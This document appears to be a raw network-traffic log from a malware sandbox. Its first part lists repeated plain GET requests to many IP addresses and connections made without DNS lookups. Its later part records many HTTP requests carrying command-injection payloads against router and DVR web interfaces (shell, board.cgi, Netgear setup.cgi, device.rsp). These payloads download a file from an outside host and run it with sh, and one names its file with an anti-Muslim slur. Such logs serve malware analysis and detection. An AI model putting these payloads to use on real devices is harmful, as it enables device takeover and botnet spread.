Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.208Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 89.253.219.24Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 136.243.14.123Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 172.67.167.8Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 104.21.57.213Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 172.67.167.8Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 104.21.57.213Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 172.67.167.8Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 104.21.57.213Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 172.67.167.8Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.9Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 24.102.48.178
Source: unknown TCP traffic detected without corresponding DNS query: 132.87.118.194
Source: unknown TCP traffic detected without corresponding DNS query: 44.76.195.169
Source: unknown TCP traffic detected without corresponding DNS query: 27.157.128.253
Source: unknown TCP traffic detected without corresponding DNS query: 190.79.81.130
Source: unknown TCP traffic detected without corresponding DNS query: 123.144.44.39
Source: unknown TCP traffic detected without corresponding DNS query: 114.14.67.24
Source: unknown TCP traffic detected without corresponding DNS query: 144.3.150.68
Source: unknown TCP traffic detected without corresponding DNS query: 174.11.202.229
Source: unknown TCP traffic detected without corresponding DNS query: 143.96.76.96
Source: unknown TCP traffic detected without corresponding DNS query: 109.132.33.248
Source: unknown TCP traffic detected without corresponding DNS query: 65.100.17.161
Source: unknown TCP traffic detected without corresponding DNS query: 103.118.50.165
Source: unknown TCP traffic detected without corresponding DNS query: 85.179.211.90
Source: unknown TCP traffic detected without corresponding DNS query: 47.178.91.210
Source: unknown TCP traffic detected without corresponding DNS query: 171.63.9.126
Source: unknown TCP traffic detected without corresponding DNS query: 186.167.111.168
Source: unknown TCP traffic detected without corresponding DNS query: 131.213.83.243
Source: unknown TCP traffic detected without corresponding DNS query: 130.242.140.54
Source: unknown TCP traffic detected without corresponding DNS query: 99.24.62.29
Source: unknown TCP traffic detected without corresponding DNS query: 43.28.152.241
Source: unknown TCP traffic detected without corresponding DNS query: 167.138.20.13
Source: unknown TCP traffic detected without corresponding DNS query: 14.139.48.19
Source: unknown TCP traffic detected without corresponding DNS query: 35.85.79.158
Source: unknown TCP traffic detected without corresponding DNS query: 180.13.107.140
Source: unknown TCP traffic detected without corresponding DNS query: 181.172.233.26
Source: unknown TCP traffic detected without corresponding DNS query: 80.156.82.218
Source: unknown TCP traffic detected without corresponding DNS query: 151.101.229.246
Source: unknown TCP traffic detected without corresponding DNS query: 78.139.68.130
Source: unknown TCP traffic detected without corresponding DNS query: 94.36.97.154
Source: unknown TCP traffic detected without corresponding DNS query: 66.26.138.33
Source: unknown TCP traffic detected without corresponding DNS query: 17.202.6.92
Source: unknown TCP traffic detected without corresponding DNS query: 174.55.21.185
Source: unknown TCP traffic detected without corresponding DNS query: 128.255.81.129
Source: unknown TCP traffic detected without corresponding DNS query: 36.183.117.61
Source: unknown TCP traffic detected without corresponding DNS query: 62.66.250.149
Source: unknown TCP traffic detected without corresponding DNS query: 40.115.147.249
Source: unknown TCP traffic detected without corresponding DNS query: 191.51.44.237
Source: unknown TCP traffic detected without corresponding DNS query: 83.153.213.58
Source: unknown TCP traffic detected without corresponding DNS query: 25.234.58.31
Source: unknown TCP traffic detected without corresponding DNS query: 150.172.89.147
Source: unknown TCP traffic detected without corresponding DNS query: 19.248.151.219
Source: unknown TCP traffic detected without corresponding DNS query: 139.204.96.73
Source: unknown TCP traffic detected without corresponding DNS query: 134.183.148.179
Source: unknown TCP traffic detected without corresponding DNS query: 93.179.205.14
Source: unknown TCP traffic detected without corresponding DNS query: 102.224.40.16
Source: unknown TCP traffic detected without corresponding DNS query: 213.75.55.237
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.118.39Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.118.39Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.118.39Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.118.39Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.118.39Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.118.39Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.118.39Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.118.39Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.118.39Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.118.39Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.118.39Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.118.39Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.118.39Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.2Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.2Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.2Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.2Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.2Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.2Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.5Connection: close
